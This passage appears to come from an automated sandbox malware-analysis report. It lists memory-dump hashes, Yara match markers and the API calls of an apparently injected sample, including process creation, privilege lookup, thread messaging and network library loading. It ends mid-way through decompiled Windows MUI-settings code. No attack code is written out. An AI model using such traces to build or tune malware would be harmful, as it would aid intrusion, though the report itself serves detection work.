Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFC6B

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFD9A

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 009FFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFDCB

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 009FFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFEDB

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFFBF

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00098C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00098CF8

Strings

wininet.dll, xrefs: 00098CAE, 00098CB7
net.dll, xrefs: 00098CC1, 00098D47, 00098D1F, 00098D2B, 00098D53

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: efccf27be1aa57133fd116f08640fec12b4eb8f16e7abb3e21e6745e46afcc05
Instruction ID: 11a2e1c9c87b3a4a7908bd7be5cc15f9e92b2bfb82e500481b01abc5b625eac7
Opcode Fuzzy Hash: efccf27be1aa57133fd116f08640fec12b4eb8f16e7abb3e21e6745e46afcc05
Instruction Fuzzy Hash: 853194B2500244BBCB24DF64D885FA7B7F8BB48700F10851DF629AB241DB71B650DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00098C46, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00098CF8

Strings

wininet.dll, xrefs: 00098CAE, 00098CB7
net.dll, xrefs: 00098CC1, 00098D1F, 00098D2B

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 38c891bd1b19568ea928f65b6f233b9601f59c717004f2c9490d21389379b147
Instruction ID: 0d7dce911c0841dd06656ef77099183f754194f0d93118ec68bcfa20ff06f061
Opcode Fuzzy Hash: 38c891bd1b19568ea928f65b6f233b9601f59c717004f2c9490d21389379b147
Instruction Fuzzy Hash: DA21A5B1600245ABCB24DF64D985FABB7F4FB49700F10801EE619AB382DB75A550DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0009A240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A26D

Strings

.z`, xrefs: 0009A25C, 0009A268

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 54e535b0c3ade3fa34cc340f59b9eb0f073b7bb98307ebf2ae86aa7dfee4794f
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 43E04FB12102046BDB14DF59CC45EE777ADEF88750F014554FD0857242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A23E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A26D

Strings

.z`, xrefs: 0009A25C, 0009A268

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: e94cb264beb76e41ca0c51ceb12aff95e919fea980b0c589493f4f9926800c33
Instruction ID: 082a214cceb4ee6df86a31df0dc84664cc5f42c79f2bfdc4599f14c2f513dc89
Opcode Fuzzy Hash: e94cb264beb76e41ca0c51ceb12aff95e919fea980b0c589493f4f9926800c33
Instruction Fuzzy Hash: 2EE04FB52115046BDB14DF64CC45EA7736DEF88350F058695FD085B242CA30E914CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 000882E8, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e3d83495b74ebd87ea2e6fd9b1a4d90d9f32f2dcfdea82f0d0503d1703207fe9
Instruction ID: c6367ac62839cb0c29db7a1ee694eee3071a794323d0850a0f97e54ada2ca425
Opcode Fuzzy Hash: e3d83495b74ebd87ea2e6fd9b1a4d90d9f32f2dcfdea82f0d0503d1703207fe9
Instruction Fuzzy Hash: BF01B531A802287AEB21E6949C02FFE7B6CAB91F50F044119FB04BA1C2E695690653F6

Uniqueness

Uniqueness Score: -1.00%

Function 000882B4, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 80b0365af39282a96ff5de5ef575f4ce902631b54cd7e70474b93eeb2a4a1300
Instruction ID: c9ca1fe4073a67ed886c4e187efdc2921f393a4b00ec533e1cae1c54b13ae7d5
Opcode Fuzzy Hash: 80b0365af39282a96ff5de5ef575f4ce902631b54cd7e70474b93eeb2a4a1300
Instruction Fuzzy Hash: 93017B72A4022876EE20B6647C03FFE335CBF51F64F498055FE44BA1C3EA95AA0653E1

Uniqueness

Uniqueness Score: -1.00%

Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d0f800050b211bb5b0751991ced225e5378464dfd3b8df71b8661dc9f9100826
Instruction ID: d7e655f22da4a91650d361ec3b8494785a4e606699977feabf74a54a36b93c22
Opcode Fuzzy Hash: d0f800050b211bb5b0751991ced225e5378464dfd3b8df71b8661dc9f9100826
Instruction Fuzzy Hash: A2018F31A802287BEB20B6949C03FFE766CAB51F51F054119FB04BA1C2EAD46A0657E6

Uniqueness

Uniqueness Score: -1.00%

Function 0008ACC3, Relevance: 1.6, APIs: 1, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0008AD42

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: adeb3630c6495c4263cc709c1ceb55c5c37d0ce7be4dfb3474c6913184be2a7b
Instruction ID: 42f325c2cdde64197835a854c9689a9a9a4c4af58a033f235e5dddd3b28b954c
Opcode Fuzzy Hash: adeb3630c6495c4263cc709c1ceb55c5c37d0ce7be4dfb3474c6913184be2a7b
Instruction Fuzzy Hash: 5E112C35A081455FEB20FB549485AF87B95EB17308F04019BECD987643E9739908C792

Uniqueness

Uniqueness Score: -1.00%

Function 0008ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0008AD42

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: 6f801b1de7a998f22d6e595fe5537f85f07595b27a34b44d9f511b5d9e241686
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: D6015EB5E4020DBBEF10EAA4DC42FDEB3B8AB54308F004195E90997642FA70EB149B91

Uniqueness

Uniqueness Score: -1.00%

Function 0009A2AD, Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A304

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 801c2a13435f7a1ffa9201c991bea4cb807bc720b0bb8924215a1ad50c190f4d
Instruction ID: d985b3297b5c8305819c028449515a0027820deaeeca3f08401f65b9c54c2a44
Opcode Fuzzy Hash: 801c2a13435f7a1ffa9201c991bea4cb807bc720b0bb8924215a1ad50c190f4d
Instruction Fuzzy Hash: 2E01A4B2210108BBCB54DF8DDC80EEB77ADAF8C754F558258BA0DA7241C630E851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0009A2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A304

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5d6bd288da2655ed01ea0e3f25e33d3f7211b68252b2ba5e52bba1c56376a353
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: B401B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00098D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F020,?,?,00000000), ref: 00098DBC

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9fd13ad1eddfb97d1fc3a7be7d1ce3a32329781aa6c6b2d655bbcfbc2f374003
Instruction ID: 9c7c036a4100861d175a37552b7e353ef6bbfb47ec2dd77b23695f2edda18cca
Opcode Fuzzy Hash: 9fd13ad1eddfb97d1fc3a7be7d1ce3a32329781aa6c6b2d655bbcfbc2f374003
Instruction Fuzzy Hash: 0BE06D333813043AEB206599AC02FE7B39C9B95B21F540026FA4DEA2C2D995F80142A4

Uniqueness

Uniqueness Score: -1.00%

Function 0009A391, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A3D0

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 77c6ecdd6eee220258bed116241d418902cc08204727bd95c70105a5cdbf0b33
Instruction ID: 010d66b0a620c24ce6615945ae61a7bd6549740f696968700a20619705b98dd4
Opcode Fuzzy Hash: 77c6ecdd6eee220258bed116241d418902cc08204727bd95c70105a5cdbf0b33
Instruction Fuzzy Hash: 89F0A0B63002046BDB10EF58DC80EE73759EF89354F0185A5F90C9B642D931E91687F5

Uniqueness

Uniqueness Score: -1.00%

Function 0009A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A22D

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 7b9807843d8cc8ffa2db31d7bad46b39d04cdfa12a1a088cf1092c63824a4309
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: C4E012B1210208ABDB14EF99CC41EAB77ADAF88650F118558BA085B242CA30F9118AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A3D0

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 5b2d72e10932785ce3449e3bf7c3356d4a6e2b8995ea55a0d888a9e5b8fa81be
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 5AE01AB12002086BDB10DF49CC85EEB37ADAF89650F018154BA0857242CA30E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008F697, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7ad0e853fd799a78b8d0305d08b7373e3ad6b7b73b2d4236807e2a8b1c54209d
Instruction ID: d99471297520719b55b3a9131719e42834da9814eaba4022eb052416cdc450f9
Opcode Fuzzy Hash: 7ad0e853fd799a78b8d0305d08b7373e3ad6b7b73b2d4236807e2a8b1c54209d
Instruction Fuzzy Hash: CEE0C2227A02012AE720BA708C06FAA268A7B52661F4D0264F6E9E72D3D910D4018220

Uniqueness

Uniqueness Score: -1.00%

Function 0008F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction ID: 6417aeeebd7252583303f3220bff117056388d79c37cbfd200bc3d3567543684
Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction Fuzzy Hash: 22D0A7717903043BEA10FAA49C03F6632CD6B44B04F490074FA88D73C3E950E4014165

Uniqueness

Uniqueness Score: -1.00%

Function 0009A3D6, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A3D0

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: dba54a64cb1fa61b39a2b5cc394bc1c3ca33cfcb02b094dd61a9124cc52fd439
Instruction ID: c4e58cce06b01d8db9d50b6666876e5346fefdfd31fd8ca7b5643d06c6ed50aa
Opcode Fuzzy Hash: dba54a64cb1fa61b39a2b5cc394bc1c3ca33cfcb02b094dd61a9124cc52fd439
Instruction Fuzzy Hash: 72D012725045582FDB51DB649E844F6775CEB4A674328854AFCDC1E00D8820450A57E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A28788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00A28788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A28460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A0E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A2718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A28460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A2718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A28460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A28460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A28460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A2718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A02340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A1E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A0E2A8(_t322,  &_v68, _v16);
								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A1E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A0E2A8(_t322,  &_v68, _t236);
								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
